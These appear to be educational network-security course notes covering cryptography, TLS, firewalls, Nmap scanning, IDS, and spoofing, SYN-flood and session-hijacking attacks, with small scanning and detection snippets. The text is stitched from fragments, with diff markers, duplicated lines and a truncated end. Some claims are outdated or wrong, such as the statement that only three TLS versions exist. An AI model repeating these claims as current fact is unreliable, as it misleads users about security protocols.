- Refer: <https://medium.com/@akhigbemmanuel/what-is-the-diffie-hellman-key-exchange-algorithm-84d60025a30d>
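As a rough sketch of the math (toy parameters for readability; real deployments use large primes or elliptic-curve groups):
```
# Toy Diffie-Hellman exchange; p and g are tiny illustrative values.
import secrets

p, g = 23, 5                       # public parameters
a = secrets.randbelow(p - 2) + 1   # Alice's private exponent
b = secrets.randbelow(p - 2) + 1   # Bob's private exponent

A = pow(g, a, p)                   # Alice sends A = g^a mod p
B = pow(g, b, p)                   # Bob sends B = g^b mod p

assert pow(B, a, p) == pow(A, b, p)  # both derive the same shared secret
```
The shared value can then seed a symmetric cipher, matching the hybrid approach described above.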
RSA
- The RSA algorithm is very flexible and has a variable key length where, if necessary, speed can be traded for the level of security of the algorithm. The RSA keys are usually 512 to 2048 bits long. RSA has withstood years of extensive cryptanalysis. Although those years neither proved nor disproved RSA's security, they attest to a confidence level in the algorithm. RSA security is based on the difficulty of factoring very large numbers. If an easy method of factoring these large numbers were discovered, the effectiveness of RSA would be destroyed.
- Refer: <https://medium.com/curiositypapers/a-complete-explanation-of-rsa-asymmetric-encryption-742c5971e0f>
**NOTE**: RSA Keys can be used for key exchange just like Diffie Hellman
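A textbook-RSA sketch with tiny primes, purely to show the arithmetic (real RSA uses 2048-bit keys and padding such as OAEP, never raw exponentiation like this):
```
# Textbook RSA with toy primes; requires Python 3.8+ for pow(e, -1, phi).
p, q = 61, 53
n = p * q                  # public modulus
phi = (p - 1) * (q - 1)
e = 17                     # public exponent, coprime with phi
d = pow(e, -1, phi)        # private exponent (modular inverse of e)

m = 42                     # message encoded as an integer < n
c = pow(m, e, n)           # encrypt with the public key (e, n)
assert pow(c, d, n) == m   # decrypt with the private key (d, n)
```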
Hashing Algorithms
Digital Certificates
- Key management is often considered the most difficult task in designing and implementing cryptographic systems. Businesses can simplify some of the deployment and management issues that are encountered with secured data communications by employing a Public Key Infrastructure (PKI). Because corporations often move security-sensitive communications across the Internet, an effective mechanism must be implemented to protect sensitive information from the threats presented on the Internet.
- PKI provides a hierarchical framework for managing digital security attributes. Each PKI participant holds a digital certificate that has been issued by a CA (either public or private). The certificate contains several attributes that are used when parties negotiate a secure connection. These attributes must include the certificate validity period, end-host identity information, encryption keys that will be used for secure communications, and the signature of the issuing CA. Optional attributes may be included, depending on the requirements and capability of the PKI.
- A CA can be a trusted third party, such as VeriSign or Entrust, or a private (in-house) CA that you establish within your organization.
- The fact that the message could be decrypted using the sender's public key means that the holder of the private key created the message. This process relies on the receiver having a copy of the sender's public key and knowing with a high degree of certainty that it really does belong to the sender and not to someone pretending to be the sender.
- To validate the CA's signature, the receiver must know the CA's public key. Normally, this is handled out-of-band or through an operation performed during the installation of the certificate. For instance, most web browsers are configured with the root certificates of several CAs by default.
CA Enrollment process
The major features and guarantees of the SSH protocol are:
- Integrity of communications, guaranteeing they havent been altered
- Authentication, i.e., proof of identity of senders and receivers
- Authorization, i.e., access control to accounts
- Forwarding or tunnelling to encrypt other TCP/IP-based sessions
### Kerberos
- According to Greek mythology, Kerberos (Cerberus) was the gigantic, three-headed dog that guarded the gates of the underworld to prevent the dead from leaving.
- So when it comes to Computer Science, Kerberos is a network authentication protocol and is currently the default authentication technology used by Microsoft Active Directory to authenticate users to services within a local area network.
- Kerberos uses symmetric-key cryptography and requires a trusted third-party authentication service to verify user identities. So they used the name of Kerberos for their computer network authentication protocol as the three heads of the Kerberos represent:
- a client: a user or a service
- a server: the host on which the Kerberos-protected service resides
![image10](images/image10.png)
- a Key Distribution Center (KDC), which acts as the trusted third-party authentication service.
The KDC includes the following two servers:
- Authentication Server (AS) that performs the initial authentication and issues ticket-granting tickets (TGT) for users.
- Ticket-Granting Server (TGS) that issues service tickets that are based on the initial ticket-granting tickets (TGT).
Certificate chain
- The issuer line indicates its issued by Google Internet Authority G2, which also happens to be the subject of the second certificate, number 1.
- What the OpenSSL command line doesnt show here is the trust store that contains the list of CA certificates trusted by the system OpenSSL runs on.
- The public certificate of GlobalSign Authority must be present in the systems trust store to close the verification chain. This is called a chain of trust, and the figure below summarizes its behaviour at a high level.
![image122](images/image122.png)
1. The client sends a HELLO message to the server with a list of protocols and algorithms it supports.
2. The server says HELLO back and sends its chain of certificates. Based on the capabilities of the client, the server picks a cipher suite.
3. If the cipher suite supports ephemeral key exchange, as ECDHE does (ECDHE stands for Elliptic Curve Diffie-Hellman Exchange), the server and the client negotiate a pre-master key with the Diffie-Hellman algorithm. The pre-master key is never sent over the wire.
4. The client and server create a session key that will be used to encrypt the data transiting through the connection.
At the end of the handshake, both parties possess a secret session key used to encrypt data for the rest of the connection. This is what OpenSSL refers to as Master-Key.
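One way to observe the outcome of this handshake is Python's standard ssl module (the hostname below is illustrative):
```
# Connect with TLS and inspect what the handshake negotiated.
import socket
import ssl

ctx = ssl.create_default_context()   # uses the system trust store
with ctx.wrap_socket(socket.create_connection(("example.com", 443)),
                     server_hostname="example.com") as tls:
    print(tls.version())                # negotiated protocol, e.g. TLSv1.3
    print(tls.cipher())                 # negotiated cipher suite
    print(tls.getpeercert()["issuer"])  # CA that signed the server certificate
```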
- There are 3 versions of TLS: TLS 1.0, 1.1 & 1.2.
- TLS 1.0 was released in 1999, making it a nearly two-decade-old protocol. It has been known to be vulnerable to attacks—such as BEAST and POODLE—for years, in addition to supporting weak cryptography, which doesnt keep modern-day connections sufficiently secure.
- TLS 1.1 is the forgotten “middle child.” It also has bad cryptography like its younger sibling. In most software, it was leapfrogged by TLS 1.2 and its rare to see TLS 1.1 used.
### “Perfect” Forward Secrecy
- The term “ephemeral” in the key exchange provides an important security feature mis-named perfect forward secrecy (PFS) or just “Forward Secrecy”.
- In a non-ephemeral key exchange, the client sends the pre-master key to the server by encrypting it with the servers public key. The server then decrypts the pre-master key with its private key. If, at a later point in time, the private key of the server is compromised, an attacker can go back to this handshake, decrypt the pre-master key, obtain the session key, and decrypt the entire traffic. Non-ephemeral key exchanges are vulnerable to attacks that may happen in the future on recorded traffic. And because people seldom change their password, decrypting data from the past may still be valuable for an attacker.
- An ephemeral key exchange like DHE, or its variant on elliptic curve, ECDHE, solves this problem by not transmitting the pre-master key over the wire. Instead, the pre-master key is computed by both the client and the server in isolation, using nonsensitive information exchanged publicly. Because the pre-master key cant be decrypted later by an attacker, the session key is safe from future attacks: hence, the term perfect forward secrecy.
- Keys are changed every X blocks along the stream. That prevents an attacker from simply sniffing the stream and applying brute force to crack the whole thing. “Forward secrecy” means that being able to decrypt block M does not imply being able to decrypt block Q.
- Downside:

---

## What to expect from this course
The course covers fundamentals of information security along with touching on subjects of system security, network & web security. This course aims to get you familiar with the basics of information security in day to day operations & then as an SRE develop the mindset of ensuring that security takes a front-seat while developing solutions. The course also serves as an introduction to common risks and best practices along with practical ways to find out vulnerable systems and loopholes which might become compromised if not secured.
## What is not covered under this course

---

# Part II: Network Security
## Introduction
- TCP/IP is the dominant networking technology today. It is a five-layer architecture. These layers are, from top to bottom, the application layer, the transport layer (TCP), the network layer (IP), the data-link layer, and the physical layer. In addition to TCP/IP, there also are other networking technologies. For convenience, we use the OSI network model to represent non-TCP/IP network technologies. Different networks are interconnected using gateways. A gateway can be placed at any layer.
- The OSI model is a seven-layer architecture. The OSI architecture is similar to the TCP/IP architecture, except that the OSI model specifies two additional layers between the application layer and the transport layer in the TCP/IP architecture. These two layers are the presentation layer and the session layer. Figure 5.1 shows the relationship between the TCP/IP layers and the OSI layers. The application layer in TCP/IP corresponds to the application layer and the presentation layer in OSI. The transport layer in TCP/IP corresponds to the session layer and the transport layer in OSI. The remaining three layers in the TCP/IP architecture are one-to-one correspondent to the remaining three layers in the OSI model.
![image14](images/image14.png)
Correspondence between layers of the TCP/IP architecture and the OSI model. Also shown are placements of cryptographic algorithms in network layers, where the dotted arrows indicate actual communications of cryptographic algorithms
The functionalities of OSI layers are briefly described as follows:
7. The physical layer is responsible for transmitting device-dependent frames through some physical media.
- Starting from the application layer, data generated from an application program is passed down layer-by-layer to the physical layer. Data from the previous layer is enclosed in a new envelope at the current layer, where the data from the previous layer is also just an envelope containing the data from the layer before it. This is similar to enclosing a smaller envelope in a larger one. The envelope added at each layer contains sufficient information for handling the packet. Application-layer data are divided into blocks small enough to be encapsulated in an envelope at the next layer.
- Application data blocks are “dressed up” in the TCP/IP architecture according to the following basic steps. At the sending side, an application data block is encapsulated in a TCP packet when it is passed down to the TCP layer. In other words, a TCP packet consists of a header and a payload, where the header corresponds to the TCP envelope and the payload is the application data block. Likewise, the TCP packet will be encapsulated in an IP packet when it is passed down to the IP layer. An IP packet consists of a header and a payload, which is the TCP packet passed down from the TCP layer. The IP packet will be encapsulated in a device-dependent frame (e.g., an Ethernet frame) when it is passed down to the data-link layer. A frame has a header, and it may also have a trailer. For example, in addition to having a header, an Ethernet frame also has a 32-bit cyclic redundancy check (CRC) trailer. When it is passed down to the physical layer, a frame will be transformed into a sequence of media signals for transmission
![image15](images/image15.png)
Flow Diagram of a Packet Generation
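For illustration, the same layering can be reproduced with the scapy library (assuming `pip install scapy`; the address and ports are placeholders):
```
# Build a packet layer by layer, mirroring the envelope model above.
from scapy.all import IP, TCP, Raw

app_data = Raw(load=b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
segment = TCP(sport=40000, dport=80) / app_data  # TCP header + application payload
packet = IP(dst="198.51.100.10") / segment       # IP header + TCP segment
packet.show()                                    # print the headers of each layer
```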
### Public Key Infrastructure
- To deploy cryptographic algorithms in network applications, we need a way to distribute secret keys using open networks. Public-key cryptography is the best way to distribute these secret keys. To use public-key cryptography, we need to build a public-key infrastructure (PKI) to support and manage public-key certificates and certificate authority (CA) networks. In particular, PKIs are set up to perform the following functions:
- Determine the legitimacy of users before issuing public-key certificates to them.
- Issue public-key certificates upon user requests.
- Extend a public-key certificates validity period upon user request.
### PGP & S/MIME: Email Security
- There are several security protocols at the application layer. The most used of these protocols are email security protocols namely PGP and S/MIME.
- SMTP (“Simple Mail Transfer Protocol”) is used for sending and delivering from a client to a server via port 25: its the outgoing server. On the contrary, POP (“Post Office Protocol”) allows the user to pick up the message and download it into his inbox: its the incoming server. The latest version of the Post Office Protocol is named POP3, and its been used since 1996; it uses port 110.
PGP
GPG (GnuPG)
- GnuPG is another free encryption standard that companies may use that is based on OpenPGP.
- GnuPG serves as a replacement for Symantecs PGP.
- The main difference is the supported algorithms. However, GnuPG plays nice with PGP by design. Because GnuPG is open, some businesses would prefer the technical support and the user interface that comes with Symantecs PGP.
- It is important to note that there are some nuances between the compatibility of GnuPG and PGP, such as the compatibility between certain algorithms, but in most applications such as email, there are workarounds. One such algorithm is the IDEA Module which isnt included in GnuPG out of the box due to patent issues.
S/MIME
- SMTP can only handle 7-bit ASCII text messages (UTF-8 extensions can alleviate this limitation). While POP can handle other content types besides 7-bit ASCII, POP may, under a common default setting, download all the messages stored in the mail server to the user's local computer and then remove them from the mail server. This makes it difficult for the user to read his messages from multiple computers.
- The Multipurpose Internet Mail Extension protocol (MIME) was designed to support sending and receiving email messages in various formats, including nontext files generated by word processors, graphics files, sound files, and video clips. Moreover, MIME allows a single message to include mixed types of data in any combination of these formats.
- The Internet Mail Access Protocol (IMAP), operated on TCP port 143 (only for non-encrypted connections), stores incoming email messages in the mail server until the user deletes them deliberately (this behaviour is configurable on both server and client, just like POP). This allows the user to access his mailbox from multiple machines and download messages to a local machine without deleting them from the mailbox in the mail server.
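A small sketch of MIME in practice, using Python's standard email package (addresses and attachment bytes are made up):
```
# Build a MIME message with a text body and a binary attachment.
from email.message import EmailMessage

msg = EmailMessage()
msg["From"] = "alice@example.com"
msg["To"] = "bob@example.com"
msg["Subject"] = "MIME demo"
msg.set_content("Hello, this is the plain-text part.")  # text/plain part
msg.add_attachment(b"\x89PNG\r\n fake image bytes",     # becomes a base64-encoded part
                   maintype="image", subtype="png", filename="chart.png")
print(msg.as_string()[:300])  # multipart/mixed structure with MIME headers
```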
SSL/TLS
- SSL uses a PKI to decide if a servers public key is trustworthy by requiring servers to use a security certificate signed by a trusted CA.
- When Netscape Navigator 1.0 was released, it trusted a single CA operated by the RSA Data Security corporation.
- The servers public RSA key used to be stored in the security certificate, which could then be used by the browser to establish a secure communication channel. The security certificates we use today still rely on the same standard (named X.509) that Netscape Navigator 1.0 used back then.
- Netscape intended to train users(though this didnt work out later) to differentiate secure communications from insecure ones, so they put a lock icon next to the address bar. When the lock is open, the communication is insecure. A closed lock means communication has been secured with SSL, which required the server to provide a signed certificate. Youre obviously familiar with this icon as its been in every browser ever since. The engineers at Netscape truly created a standard for secure internet communications.
- A year after releasing SSL 2.0, Netscape fixed several security issues and released SSL 3.0, a protocol that, albeit being officially deprecated since June 2015, remains in use in certain parts of the world more than 20 years after its introduction. To standardize SSL, the Internet Engineering Task Force (IETF) created a slightly modified SSL 3.0 and, in 1999, unveiled it as Transport Layer Security (TLS) 1.0. The name change between SSL and TLS continues to confuse people today. Officially, TLS is the new SSL, but in practice, people use SSL and TLS interchangeably to talk about any version of the protocol.
- Must See:
- <https://tls.ulfheim.net/>
Let us see how we keep a check on the perimeter, i.e. the edges, the first layer of defence.
- This is because IP packets, regardless of whether they are encrypted, can always be forwarded into an edge network.
- Firewalls that were developed in the 1990s are important instruments to help restrict network access. A firewall may be a hardware device, a software package, or a combination of both.
- Packets flowing into the internal network from the outside should be evaluated before they are allowed to enter. One of the critical elements of a firewall is its ability to examine packets without imposing a negative impact on communication speed while providing security protections for the internal network.
- The packet inspection that is carried out by firewalls can be done using several different methods. Based on the particular method used by the firewall, it can be characterized as either a packet filter, circuit gateway, application gateway, or dynamic packet filter.
### Packet Filters
- It inspects ingress packets coming to an internal network from outside and inspects egress packets going outside from an internal network
- Packet filtering inspects only IP headers and TCP headers, not the payloads generated at the application layer
- A packet-filtering firewall uses a set of rules to determine whether a packet should be allowed or denied to pass through (a minimal rule-matching sketch follows this list).
- 2 types:
- Stateless
- It treats each packet as an independent object, and it does not keep track of any previously processed packets. In other words, stateless filtering inspects a packet when it arrives and makes a decision without leaving any record of the packet being inspected.
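A minimal sketch of stateless rule matching in Python (the rule fields and packets are illustrative, not a real firewall API):
```
# Each rule looks only at header fields of one packet; no state is kept.
RULES = [
    {"proto": "tcp", "dst_port": 23,  "action": "deny"},   # block inbound telnet
    {"proto": "tcp", "dst_port": 443, "action": "allow"},  # allow HTTPS
]
DEFAULT_ACTION = "deny"  # default-deny posture

def filter_packet(pkt):
    for rule in RULES:
        if pkt["proto"] == rule["proto"] and pkt["dst_port"] == rule["dst_port"]:
            return rule["action"]
    return DEFAULT_ACTION

print(filter_packet({"proto": "tcp", "dst_port": 23}))   # deny
print(filter_packet({"proto": "tcp", "dst_port": 443}))  # allow
```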
### Application Gateways (ALG)
- Aka PROXY Servers
- An Application Level Gateway (ALG) acts as a proxy for internal hosts, processing service requests from external clients.
- An ALG performs deep inspections on each IP packet (ingress or egress).
- In particular, an ALG inspects application program formats contained in the packet (e.g., MIME format or SQL format) and examines whether its payload is permitted.
- Thus, an ALG may be able to detect a computer virus contained in the payload. Because an ALG inspects packet payloads, it may be able to detect malicious code and quarantine suspicious packets, in addition to blocking packets with suspicious IP addresses and TCP ports. On the other hand, an ALG also incurs substantial computation and space overheads.
### Trusted Systems & Bastion Hosts
- A Trusted Operating System (TOS) is an operating system that meets a particular set of security requirements. Whether an operating system can be trusted or not depends on several elements. For example, for an operating system on a particular computer to be certified trusted, one needs to validate that, among other things, the following four requirements are satisfied:
- Its system design contains no defects;
- Its system software contains no loopholes;
- Its system is configured properly; and
- Its system management is appropriate.
- Bastion Hosts
- Bastion hosts are computers with strong defence mechanisms. They often serve as host computers for implementing application gateways, circuit gateways, and other types of firewalls. A bastion host is operated on a trusted operating system that must not contain unnecessary functionalities or programs. This measure helps to reduce error probabilities and makes it easier to conduct security checks. Only those network application programs that are necessary, for example, SSH, DNS, SMTP, and authentication programs, are installed on a bastion host.
- Bastion hosts are also primarily used as controlled ingress points so that security monitoring can focus narrowly on actions happening at a single point.
---
### Scanning Ports with Nmap
- Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
- The best thing about Nmap is its free and open source and is very flexible and versatile
- Nmap ("Network Mapper") is a free and open-source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
- The best thing about Nmap is that its free and open-source, flexible, and versatile
- Nmap is often used to determine alive hosts in a network, open ports on those hosts, services running on those open ports, and version identification of that service on that port.
- More at http://scanme.nmap.org/
Nmap uses 6 different port states:
- **Open** — An open port is one that is actively accepting TCP, UDP or SCTP connections. Open ports are what interests us the most because they are the ones that are vulnerable to attacks. Open ports also show the available services on a network.
- **Closed** — A port that receives and responds to Nmap probe packets but there is no application listening on that port. Useful for identifying that the host exists and for OS detection.
- **Filtered** — Nmap cant determine whether the port is open because packet filtering prevents its probes from reaching the port. Filtering could come from firewalls or router rules. Often little information is given from filtered ports during scans as the filters can drop the probes without responding or respond with useless error messages e.g. destination unreachable.
- **Unfiltered** — Port is accessible but Nmap doesnt know if it is open or closed. Only used in ACK scan which is used to map firewall rulesets. Other scan types can be used to identify whether the port is open.
- **Open/filtered** — Nmap is unable to determine between open and filtered. This happens when an open port gives no response. No response could mean that the probe was dropped by a packet filter or any response is blocked.
- **Closed/filtered** — Nmap is unable to determine whether a port is closed or filtered. Only used in the IP ID idle scan.
- TCP Connect scan completes the 3-way handshake.
- If a port is open, the operating system completes the TCP three-way handshake and the port scanner immediately closes the connection to avoid DoS. This is “noisy” because the services can log the sender IP address and might trigger Intrusion Detection Systems (see the connect-scan sketch after this list).
2. UDP Scan
- This scan checks to see if any UDP ports are listening.
- Since UDP does not respond with a positive acknowledgement like TCP and only responds to an incoming UDP packet when the port is closed (via an ICMP “port unreachable” message), no response means the port is either open or filtered.
3. SYN Scan
- SYN scan is another form of TCP scanning.
- This special type of scan looks for machines answering RPC (Remote Procedure Call) services
9. IDLE Scan
- It is a super stealthy method whereby the scan packets are bounced off an external host.
- You dont need to have control over the other host, but it does have to be set up and meet certain requirements. You must input the IP address of the “zombie” host and what port number to use. It is one of the more controversial options in Nmap since it only has a use for malicious attacks.
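A minimal sketch of the TCP connect scan from item 1, using only the Python standard library (scan only hosts you are authorized to, such as scanme.nmap.org mentioned above):
```
# Attempt a full three-way handshake against each port; success means open.
import socket

def connect_scan(host, ports):
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=1):
                open_ports.append(port)  # handshake completed: port is open
        except OSError:
            pass                         # closed or filtered
    return open_ports

print(connect_scan("scanme.nmap.org", range(20, 30)))
```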
Scan Techniques
A couple of scan techniques which can be used to gain more information about a system:
- OpenVAS is made up of three main parts. These are:
- a regularly updated feed of Network Vulnerability Tests (NVTs);
- a scanner, which runs the NVTs; and
- an SQLite 3 database for storing both your test configurations and the NVTs results and configurations.
- <https://www.greenbone.net/en/install_use_gce/>
### Wireshark
- This means Wireshark is designed to decode not only packet bits and bytes but also the relations between packets and protocols.
- Wireshark understands protocol sequences.
A simple demo of Wireshark
1. Capture only udp packets:
- Capture filter = “udp”
- Dumpcap is a network traffic dump tool. It captures packet data from a live network and writes the packets to a file. Dumpcaps native capture file format is pcapng, which is also the format used by Wireshark.
- By default, Dumpcap uses the pcap library to capture traffic from the first available network interface and writes the received raw packet data, along with the packets timestamps, into a pcapng file. The capture filter syntax follows the rules of the pcap library.
- The Wireshark command-line utility called 'dumpcap.exe' can be used to capture LAN traffic over an extended period of time.
- Wireshark itself can also be used, but dumpcap does not significantly utilize the computer's memory while capturing for long periods.
### DaemonLogger
- Netsniff-NG is a high-performance packet capture utility
- While the utilities weve discussed to this point rely on Libpcap for capture, Netsniff-NG utilizes zero-copy mechanisms to capture packets. This is done with the intent to support full packet capture over high throughput links.
- To begin capturing packets with Netsniff-NG, we have to specify an input and output. In most cases, the input will be a network interface, and the output will be a file or folder on disk.
`netsniff-ng --in eth1 --out data.pcap`
### IDS
A security solution that detects security-related events in your environment but does not block them.
IDS sensors can be software- or hardware-based and are used to collect and analyze network traffic. These sensors are available in two varieties, network IDS and host IDS.
- A host IDS is a server-specific agent running on a server with a minimum of overhead to monitor the operating system.
- A network IDS can be embedded in a networking device, a standalone appliance, or a module monitoring the network traffic.
Signature-Based IDS
- ex: SNORT & SURICATA
Policy-Based IDS
- The policy-based IDSs (mainly host IDSs) trigger an alarm whenever a violation occurs against the configured policy.
- This configured policy is or should be a representation of the security policies.
Anomaly-Based IDS
- Statistical anomaly detection learns the traffic patterns interactively over a period of time.
- In the nonstatistical approach, the IDS has a predefined configuration of the supposedly acceptable and valid traffic patterns.
Host-Based IDS & Network-Based IDS
- A host IDS can be described as a distributed agent residing on each server of the network that needs protection. These distributed agents are tied very closely to the underlying operating system.
Honeypots
- The use of decoy machines to direct intruders' attention away from the machines under protection is a major technique to preclude intrusion attacks. Any device, system, directory, or file used as a decoy to lure attackers away from important assets and to collect intrusion or abusive behaviours is referred to as a honeypot.
- A honeypot may be implemented as a physical device or as an emulation system. The idea is to set up decoy machines in a LAN, or decoy directories/files in a file system and make them appear important, but with several exploitable loopholes, to lure attackers to attack these machines or directories/files, so that other machines, directories, and files can evade intruders' attentions. A decoy machine may be a host computer or a server computer. Likewise, we may also set up decoy routers or even decoy LANs.
---
IP Spoofing Detection Techniques
- Direct TTL Probes
- In this technique, we send a packet that triggers a reply to the host of the suspect spoofed IP and compare the TTL of the reply with that of the suspect packet; if the TTL in the reply is not the same as in the packet being checked, it is a spoofed packet (see the probe sketch after this list).
- This technique is successful when the attacker is in a different subnet from the victim.
![image19](images/image19.png)
- IP Identification Number.
- Send a probe to the host of the suspect spoofed traffic that triggers a reply, and compare the IP ID with the suspect traffic.
- If the IP IDs are not close in value to that of the packet being checked, the suspect traffic is spoofed.
- TCP Flow Control Method
- Attackers sending spoofed TCP packets will not receive the targets SYN-ACK packets.
- Attackers cannot, therefore, be responsive to change in the congestion window size
- When the receiver still receives traffic even after the window size is exhausted, the packets are most probably spoofed.
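The direct TTL probe above can be sketched with scapy (requires root privileges; the suspect address and observed TTL are made-up values):
```
# Probe the claimed source and compare TTLs, as described under
# "Direct TTL Probes" above.
from scapy.all import IP, ICMP, sr1

suspect_ip = "203.0.113.7"   # source address claimed by the suspect packet
suspect_ttl = 57             # TTL observed in the suspect packet

reply = sr1(IP(dst=suspect_ip) / ICMP(), timeout=2, verbose=0)
if reply is not None and reply.ttl != suspect_ttl:
    print("TTL mismatch: the suspect packet is likely spoofed")
```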
### Covert Channel
- A covert or clandestine channel can be best described as a pipe or communication channel between two entities that can be exploited by a process or application transferring information in a manner that violates the system's security specifications.
- More specifically for TCP/IP, in some instances, covert channels are established, and data can be secretly passed between two end systems.
- Ex: ICMP resides at the Internet layer of the TCP/IP protocol suite and is implemented in all TCP/IP hosts. Based on the specifications of the ICMP Protocol, an ICMP Echo Request message should have an 8-byte header and a 56-byte payload. The ICMP Echo Request packet should not carry any data in the payload. However, these packets are often used to carry secret information. The ICMP packets are altered slightly to carry secret data in the payload. This makes the size of the packet larger, but no control exists in the protocol stack to defeat this behaviour. The alteration of ICMP packets allows intruders to program specialized client-server pairs. These small pieces of code export confidential information without alerting the network administrator.
- ICMP can be leveraged for more than data exfiltration. For example, some C&C tools such as Loki used an ICMP channel to establish encrypted interactive sessions back in 1996.
- Deep packet inspection has since come a long way. A lot of IDS/IPS detect ICMP tunnelling.
- Check for echo responses that do not contain the same payload as the request
- Check for the volume of ICMP traffic especially for volumes beyond an acceptable threshold
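The first heuristic can be sketched with scapy (requires root privileges; this is a toy detector, not an IDS):
```
# Flag ICMP echo replies whose payload differs from the matching request.
from scapy.all import sniff, ICMP, Raw

requests = {}  # (id, seq) -> request payload

def inspect(pkt):
    if ICMP in pkt and Raw in pkt:
        key = (pkt[ICMP].id, pkt[ICMP].seq)
        if pkt[ICMP].type == 8:        # echo request: remember its payload
            requests[key] = pkt[Raw].load
        elif pkt[ICMP].type == 0:      # echo reply: compare payloads
            if key in requests and requests[key] != pkt[Raw].load:
                print("possible ICMP tunnel:", pkt.summary())

sniff(filter="icmp", prn=inspect, store=False)
```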
### IP Fragmentation Attack
TCP Flags
- Data exchange using TCP does not happen until a three-way handshake has been completed. This handshake uses different flags to influence the way TCP segments are processed.
- There are 6 bits in the TCP header that are often called flags, namely:
- 6 different flags are part of the TCP header: Urgent pointer field (URG), Acknowledgment field (ACK), Push function (PSH), Reset the connection (RST), Synchronize sequence numbers (SYN), and the sender is finished with this connection (FIN).
![image20](images/image20.png)
- Abuse of the normal operation or settings of these flags can be used by attackers to launch DoS attacks. This causes network servers or web servers to crash or hang.
```
| 1 | 1 | 1 | 1 | Illegal Combination
```
- The attacker's ultimate goal is to write special programs or pieces of code that can construct these illegal combinations resulting in an efficient DoS attack.
SYN FLOOD
- The timers (or lack of certain timers) in the 3-way handshake are often used and exploited by attackers to disable services or even to enter systems.
- After step 2 of the three-way handshake, no limit is set on the time to wait after receiving a SYN. The attacker initiates many connection requests to the webserver of Company XYZ (almost certainly with a spoofed IP address).
- The SYN+ACK packets (Step 2) sent by the web server back to the originating source IP address are not replied to. This leaves a TCP session half-open on the webserver. Multiple packets cause multiple TCP sessions to stay open.
- Based on the hardware limitations of the server, a limited number of TCP sessions can stay open, and as a result, the webserver refuses further connection establishment attempts from any host as soon as a certain limit is reached. These half-open connections need to be completed or timed out before new connections can be established.
FIN Attack
![image22](images/image22.png)
- An authorized user (Employee X) sends HTTP requests over a TCP session with the webserver.
- The web server accepts the packets from Employee X only when the packet has the correct SEQ/ACK numbers. As seen previously, these numbers are important for the webserver to distinguish between different sessions and to make sure it is still talking to Employee X. Imagine that the cracker starts sending packets to the web server spoofing the IP address of Employee X, using the correct SEQ/ACK combination. The web server accepts the packet and increments the ACK number.
- In the meantime, Employee X continues to send packets but with incorrect SEQ/ACK numbers. As a result of sending unsynchronized packets, all data from Employee X is discarded when received by the webserver. The attacker pretends to be Employee X using the correct numbers. This finally results in the cracker hijacking the connection, whereby Employee X is completely confused and the webserver replies assuming the cracker is sending correct synchronized data.
STEPS:
3. Employee X acknowledges the packet.
4. The cracker launches a spoofed packet to the server.
5. The web server responds to the cracker. The cracker starts verifying SEQ/ACK numbers to double-check success. At this time, the cracker takes over the session from Employee X, which results in a session hanging for Employee X.
6. The cracker can start sending traffic to the web server.
6. The cracker can start sending traffic to the webserver.
7. The web server returns the requested data to confirm delivery with the correct ACK number.
8. The cracker can continue to send data (keeping track of the correct SEQ/ACK numbers) until eventually setting the FIN flag to terminate the session.
- A buffer is a temporary data storage area used to store program code and data.
- When a program or process tries to store more data in a buffer than it was originally anticipated to hold, a buffer overflow occurs.
- Buffers are temporary storage locations in memory (memory or buffer sizes are often measured in bytes) that can store a fixed amount of data. When more data is written to a buffer location than it can hold, the additional information spills into an adjacent buffer, overwriting the valid data held there.
Mechanism:
@ -477,7 +477,7 @@ Mechanism:
Countermeasure:
- The most important approach is to have a concerted focus on writing correct code.
- A second method is to make the address space of the program's data buffers (memory locations) non-executable. This type of address space makes it impossible to execute code that might be infiltrated into the program's buffers during an attack (see the sketch below).
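Python itself is memory-safe, so the following is only a model of the bounds check that "writing correct code" implies; in C, the same check must be made explicitly before every copy into a fixed-size buffer:

```
BUF_SIZE = 16

def safe_copy(buf: bytearray, data: bytes) -> None:
    # An unchecked C memcpy here would silently overwrite adjacent
    # memory; the explicit length check is the countermeasure.
    if len(data) > len(buf):
        raise ValueError(f"input of {len(data)} bytes exceeds {len(buf)}-byte buffer")
    buf[:len(data)] = data

buf = bytearray(BUF_SIZE)
safe_copy(buf, b"hello")             # fits
try:
    safe_copy(buf, b"A" * 64)        # would overflow; rejected instead
except ValueError as err:
    print("rejected:", err)
```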
### More Spoofing

View File

@ -5,22 +5,22 @@
### Cache Poisoning Attack
- Since DNS responses are cached, a quick response can be provided for repeated translations.
DNS negative queries are also cached, e.g., misspelt words, and all cached data periodically times out.
Cache poisoning is an issue in what is known as pharming. This term is used to describe a hacker's attack in which a website's traffic is redirected to a bogus website by forging the DNS mapping. In this case, an attacker attempts to insert a fake address record for an Internet domain into the DNS.
If the server accepts the fake record, the cache is poisoned and subsequent requests for the address of the domain are answered with the address of a server controlled by the attacker. As long as the fake entry is cached by the server, browsers or e-mail servers will automatically go to the address provided by the compromised DNS server.
The typical time to live (TTL) for cached entries is a couple of hours, thereby permitting ample time for numerous users to be affected by the attack.
### DNSSEC (Security Extension)
- The long-term solution to these DNS problems is authentication. If a resolver cannot distinguish between valid and invalid data in a response, then add source authentication to verify that the data received in a response is equal to the data entered by the zone administrator.
- DNS Security Extensions (DNSSEC) protects against data spoofing and corruption and provides mechanisms to authenticate servers and requests, as well as mechanisms to establish authenticity and integrity.
- When authenticating DNS responses, each DNS zone signs its data using a private key. It is recommended that this signing be done offline and in advance. The query for a particular record returns the requested resource record set (RRset) and signature (RRSIG) of the requested resource record set. The resolver then authenticates the response using a public key, which is pre-configured or learned via a sequence of key records in the DNS hierarchy.
- The goals of DNSSEC are to provide authentication and integrity for DNS responses without confidentiality or DDoS protection.
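As an illustration, the sketch below uses the third-party dnspython library (`pip install dnspython[dnssec]`) to fetch a zone's DNSKEY RRset together with its RRSIG and verify the signature. For brevity the zone's own key serves as the trust anchor; a real validating resolver walks the chain of trust down from the root, and a truncated UDP response would require retrying over TCP:

```
import dns.dnssec
import dns.message
import dns.name
import dns.query
import dns.rdatatype

zone = dns.name.from_text("example.com")
query = dns.message.make_query(zone, dns.rdatatype.DNSKEY, want_dnssec=True)
response = dns.query.udp(query, "8.8.8.8", timeout=5)

# Pick the DNSKEY RRset and its RRSIG out of the answer section.
rrsets = {rrset.rdtype: rrset for rrset in response.answer}
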